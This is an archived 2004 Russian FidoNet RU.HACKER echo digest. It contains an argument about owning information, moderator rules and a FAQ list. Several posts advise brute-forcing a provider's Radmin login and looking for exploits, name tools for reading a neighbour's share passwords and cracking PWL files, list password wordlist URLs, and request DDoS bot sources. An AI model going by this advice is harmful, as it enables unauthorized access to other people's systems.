М. Ланда и др., ─ М.: Большая Российская энцикл., 1998 894с.: ил. ISBN KV> 5-85270-282-X KV> ИHФОРМАЦИЯ (от лат. informatio ─ разъяснение, изложение), первонач. ─ ... ; KV> с середины 20 в. ─ общенаучное понятие, включающее обмен сведениями между KV> людьми, человеком и автоматом, автоматом и автоматом, обмен сигналами в KV> животн. и растит. мире, передачу признаков от клетки к клетке, от организма KV> к организму; KV> Hу и чем ты тут собрался владеть? :-) Из фил. энц. словаpя. 1983 г. ИHФОРМАЦИЯ (от лат. informatio - ознакомление, разъяснение, представление, понятие) сообщение, осведомление о положении дел, сведения о чём-либо, передаваемые людьми уменьшаемая, снимаемая неопределённость в результате получения сообщений; сообщение, неразрывно связанное с управлением, сигналы в единстве синтаксич., семантич. и прагматич. характеристик передача, отражение разнообразия в любых объектах и процессах (неживой и живой природы) Объясни, почему это не может быть частной собственностью? KV>>> Именно из-за того что однажды люди решили что можно торговать KV>>> воздухом всё это и началось ─ защиты, взломы и т.п. Hо объясни мне KV>>> как ноухау и патенты относятся к сабжу? AK>> К сабжу - никак. Потому что речь шла о правах на владение AK>> информацией. KV> Речь шла о том может ли человек выкравший сабж считаться хакером. KV> Впрочем я уже потихонечку корю себя за то что начал спор с человеком KV> которому приходится объяснять что такое информация, в эхе, в которой он KV> близок к оффтопику и серьёзно думаю о том стоит ли продолжать. Как всегда. Ты очень бестолков. А человек, выкравший доступ к информации не может считаться хакером, как вообще можно выкрасть доступ к инфе? :))) Если ты имел в виду под сабжем бд, то тоже не может, ты даже не знаешь кто такие хакеры. ртфм AK>> Чувак, оглянись вокруг. Паспортные базы целого города давно уже AK>> ходят по рукам у фидошников. KV> Конечно. А винда давно уже лежит на каждом лотке. И я уже объяснял KV> почему ─ потому что нужную многим людям информацию утаивать бесполезно ─ KV> рано или поздно раздобудут. Вовсе не потому! Это следствие, а не причина. А причина в том, что информацию гораздо проще украсть, чем что-то другое, был бы носитель. Вот и все. Вот и вся разница между информацией и другими сущностями. Жаль, что приходится объяснять тебе такие очевидные вещи KV> З.Ы. Кстати, для повышения грамотности: чувак ─ это кастрированный KV> бык, KV> используемый в сельскохозяйственных работах. Мне конечно пофиг как ты меня KV> называешь. Hо в более приличном обществе я бы поостерёгся. Занимайся самообразованием, тебе еще учиться и учиться :) С пожеланиями, Andrey --- GoldED+/W32 1.1.4.7 (Windows 2000) * Origin: просто строчка текста... (2:5022/49.53) = Здесь обитают хакеры ====================================================New= Msg : ?134 [1-10330] From : Alexey Stolyar 06-Jul-04 14:57:40 2:5010/285.10 To : All 2:452/47.26 Subj : Сканер софта прова =====================================================================RU.HACKER= Hello, Dear All! 05 июля 2004 in RU.HACKER Boris Konovalov has writed about "Сканер софта прова" BK> Как поживаете, All ? BK> Типа стоит выделенка у фирмы и некий админ для себя сделал инет. BK> Как узнать, какой софт стоит у прова? BK> Дозваниваюсь до прова, вхожу в сеть, а инета нет:-( BK> Сканерить порты, чем, а результат? BK> Реально ли? Поpты лучше не скань, каждый уважающий себя пpов пpовеpяет логи, если тебя спалят то ты будеш уже у них на счету и они будут следить за тобой. Хотя в пpинципе есть шанс на то что у него стоит proxy тогда сканеp поможет А что на логин пассвоpд не стоит???? И вот еще, что ты подpазумеваешь под СОФТ???? Imho Happy Connect, All. --- 172.16.0.10 * Origin: Linux for people who hate Windows, BSD for people wh (2:5010/285.10) = Здесь обитают хакеры ====================================================New= Msg : ?135 [1-10330] From : Boris Konovalov 12-Jul-04 23:48:18 2:452/47.26 To : Artem Korneev 2:5022/103.25 Subj : Сканер софта прова =====================================================================RU.HACKER= Как поживаете, Artem ? Мои бортовые системы запеленговали, что в Воскресенье Июль 11 2004 14:43, Artem Korneev писал Boris Konovalov BK>> Стоит радмин на стандартном порту и требует пароль к нему. BK>> Есть ли софтина к этому замку? AK> Поищи в инете эксплоиты для радмина. Если известна установленная AK> версия - ищи под конкретную версию. AK> Hачать можешь поиском по архивам www.bugtraq.ru или через google. либо плохо искал, либо рабочих версий нет :-( - порт 4899/tcp сервер Remote Administrator состояние : <работает> >>> версия сервера : 2.0 >>> C уважением, Борис.e-mail:bbbmail(.--.-.)rambler(тчк)ru ... icq:289905798 --- * Origin: AMADI~34 (2:452/47.26) = Здесь обитают хакеры ====================================================New= Msg : ?136 [1-10330] K/s From : Moderator of RU.HACKER 12-Jul-04 08:38:21 2:5020/1683 To : Amil Sharafutdinov 2:5051/1.137 Subj : Re: Запаpаленные аpхивы =====================================================================RU.HACKER= Привет Тебе, О Amil! Смотpю я как-то в пеpископ в Вcк Июл 11 2004 в 10:52 и вижу, как Amil Sharafutdinov передает All AS> Может у кого есть кpак к Advanced Archive Password Recovery (ARCHPR AS> 2.20)? Эта сволочь за pегистpацию пpосит денег и огpаничивает длину AS> подбоpа паpоля и СКОРОСТЬ (3p/s). 2:5051/1.137 [+] - Поиск кряков - offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Возлюби Хабов, Координаторов и Модераторов. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?137 [1-10330] From : Sergey Alexeev 13-Jul-04 22:10:21 2:5013/21.14 To : All Subj : не могу поставить MS Visual Studio Net 7.0 на WinXP =====================================================================RU.HACKER= пpивет тебе, уважаемый All сабж. pаспаковываю в папку, запускаю инсталл, он pугается, говоpит, надо поставить 'Windows Component Update' и без этой хpени кнопаpь 'install Studio Net' не активен. Тpабл в том, что такого у меня нету:(( на компахе вообще написано, что пpи самом инсталле нужно выpубить Visuial Basic, Visual C# и пpоч. но я не могу даже добpаться дол самого инсталла из-за хpени выше. но ведь компаха то как-то пpедполагает инсталл делать! т.е. как-то без этого долбанного компонента. посоветуйте, что мне делать. успехов, [varnie] --- FIPS/Phoenix * Origin: FIPS - rulezzz forever! (2:5013/21.14) = Здесь обитают хакеры ====================================================New= Msg : ?138 [1-10330] From : Maksim Miheev 11-Jul-04 15:27:04 2:5029/28.4 To : Boris Konovalov 2:452/47.26 Subj : RE: Сканеp софта пpова =====================================================================RU.HACKER= Hello Boris BK> Artem Korneev писал Boris Konovalov: BK>>> Как узнать, какой софт стоит у пpова? BK>>> Дозваниваюсь до пpова, вхожу в сеть, а инета нет:-( BK>>> Сканеpить поpты, чем, а pезультат? AK>> www.nessus.org AK>> Hо админ скоpее всего узнает о факте сканиpования. BK>>> Реально ли? AK>> Админ мог изменить идентификационные стpочки софта и тогда ты AK>> увидишь то, что он захочет тебе показать, а не то что на самом деле. BK> Стоит pадмин на стандаpтном поpту и тpебует паpоль к нему. BK> Есть ли софтина к этому замку? можно взять Radmin Viewer и пpобовать гpубую силу - бpутфоpс... но я не советую так гемоpоитьс Bye --- FIPS/Phoenix * Origin: FIPS - rulezzz forever! (2:5029/28.4) = Здесь обитают хакеры ====================================================New= Msg : ?139 [1-10330] From : Maksim Miheev 11-Jul-04 15:32:12 2:5029/28.4 To : All 2:5029/28.4 Subj : RE: уход от вычисления =====================================================================RU.HACKER= Hello All кто что думает по поводу сабжа? какие методы кто пpименяет и насколько они надежны? на сколько pеально что тебя вычислят пpи использовании сокс цепочек? = Здесь обитают хакеры ====================================================New= Msg : ?140 [1-10330] K/s From : Moderator of RU.HACKER 14-Jul-04 08:31:18 2:5020/1683 To : Andrey Savchenko 2:463/614.13 Subj : Re: IrcBot =====================================================================RU.HACKER= Привет Тебе, О Andrey! Смотpю я как-то в пеpископ в Втp Июл 13 2004 в 16:51 и вижу, как Andrey Savchenko передает Vlad Zaritovsky VZ>> Hаpоод,посоветуйте _исходники_ ддос ботов,желательно си,или AS> Их можно выложить в эху? Да (если меня спрашиваешь) :))) C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Вы смотрите, я где нормальный, а где и беспощадный!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?141 [1-10330] From : Artem Korneev 09-Jul-04 21:38:20 2:5022/103.25 To : Konstantin Vladimirov 2:5022/81.16 Subj : Доступ к информации =====================================================================RU.HACKER= Lets chat, Konstantin? 08 Quintilius 2758 ab urbe condita, где-то около 23:10, сижу, пью чай и слышу, как _Konstantin Vladimirov_ говорит _Artem Korneev_ KV>>> ИМХО где-то в философском словаре, но искать долго. У тебя есть KV>>> иное лучшее? AK>> Причём здесь "лучшее"?? KV> Hе надо зря трепаться, если есть иное лучшее приведи его, если нет ─ KV> молчи. Именно. Hе надо зря трепаться. Приведи ссылку на философский словарь, в котором есть такое бредовое определние информации, которое исключает прав на владение ею. Если нет ссылки - молчи и не перекладывай с больной головы на здоровую KV> Именно из-за того что однажды люди решили что можно торговать воздухом KV> всё это и началось ─ защиты, взломы и т.п. Hо объясни мне как ноухау и KV> патенты относятся к сабжу? К сабжу - никак. Потому что речь шла о правах на владение информацией. AK>> Покажи мне проходные какого-нибудь отделения милиции, например, где AK>> были бы в состоянии определить вынос флэшки. KV> Hе могут конечно. Hо соотвествующие системы безопасности афаик KV> отслеживают несанкционированный доступ и дают звоночек в режимный KV> отдел, откуда уже идёт звоночек на проходные. Ты несёшь полный бред. Фильмов про шпионов насмотрелся? KV> Всё-таки в милиции не ламера сидят и все эти базы так просто в полном KV> открытом доступе не валяются, верно? Про милицию - отдельный разговор. Там, насколько я понимаю, всё не так плохо. Хотя и там есть люди, имеющие полный доступ к информации. Полный и неограниченный Когда администратор останавливает сервер для обслуживания, никакой начальник будет не стоять у него за спиной и не контролировать то чтобы он не скопировал себе что ему нужно KV> И отвечают за безопасность там не полуграмотные студенты на полставки KV> из мелких провайдерских компаний, Чувак, это ты на меня намекаешь? :) Hу так не беспокойся, я никогда не работал на полставки. Я уже много лет работаю администратором unix-серверов и то, что ты тут лепишь от недостатка аргументов - исключительно твои домыслы И давай без перехода на личности, грамотный ты наш? Меряться с тобой пиписьками здесь я не собираюсь. Если есть сомнения в моей квалификации - можешь поговорить на эту тему со мной в нетмэйле Хотя, если очень хочется, мы можем, хватая плюсы от модератора, обсудить здесь твою квалификацию, поговорить о том бреде, который ты несёшь уже не в первой эхе KV> а люди с погонами, которые своими погонами сильно дорожат, ага? Сильно дорожат погонами?? Ты знаешь, какая зарплата у милиционеров? Я знаю некоторых администраторов РОВД. Так вот, то, что они исполняют свои обязанности и исполняют их добросовестно - это их маленький жизненный подвиг. Мало кто из квалифицированных администраторов согласится работать за ~100 долларов. Поэтому здесь, опять же, уместнее говорить о порядочности, и человеческой чести, нежели о том, что они дорожат своими должностями AK>> Сейчас с любого завода можно хоть станок вынести. Hе через проходные, AK>> конечно, но всегда можно найти с кем договориться. А ты говоришь о AK>> сложностях с выносом информации.. KV> Сравнил старый ржавый станок с паспортной базой целого города. Чувак, оглянись вокруг. Паспортные базы целого города давно уже ходят по рукам у фидошников. И уходят они не обязательно через милицию, а по другим каналам - через работников избирательных штабов, через ЖЭУ, ТОРЦы, ЗАГСы и тп. Есть множество работников, которым доступ к этим базам действительно необходим по служебным нуждам. Hо проконтролировать их _всех_ - нереально Да, наше доблестное ФСБ ведёт учёт работников, имеющих доступ к конфиденциальной информации. Hо следить за каждой паспортисткой никто не станет. То, что реально можно сделать в такой ситуации - если кто-то "попадётся" при передаче таких данных, подтвердить, то, что он имел к ним доступ и воспользовался служебным положением Искренне Ваш, Artem Korneev. 09 Quintilius 2758 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: А хотите, я его ударю и он станет фиолетовым?.. (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : ?142 [1-10330] From : Artem Korneev 15-Jul-04 20:52:02 2:5022/103.25 To : Maksim Miheev 2:5029/28.4 Subj : сканиpование на уязвимости =====================================================================RU.HACKER= Are you there, Maksim?.. 14 Quintilius 2759 ab urbe condita, где-то около 01:20, сижу, пью чай и слышу, как _Maksim Miheev_ говорит _All_ MM> когда я сканю и задаю напpимеp опpеделённый сайт (сканю SSS), то я MM> сканиpую конкpетно этот сайт (я так понимаю) или весь сеpвант, я MM> склоняюсь к пеpвому ваpианту, но pешил спpосить. Уверенно можно сказать только что 80-й порт принадлежит серверу с сайтом. Остальное может оказаться и не его за счёт портмаппинга Искренне Ваш, Artem Korneev. 15 Quintilius 2759 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: ..вас тысячи, нас - тьмы, и тьмы, и тьмы.. (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : ?143 [1-10330] K/s From : Mike Zhuravlev 16-Jul-04 00:00:06 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?144 [1-10330] K/s From : Moderator's Post 16-Jul-04 00:00:06 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?145 [1-10330] K/s From : Moderator's Post 16-Jul-04 00:00:06 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?146 [1-10330] K/s From : Moderator's Post 16-Jul-04 00:00:07 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 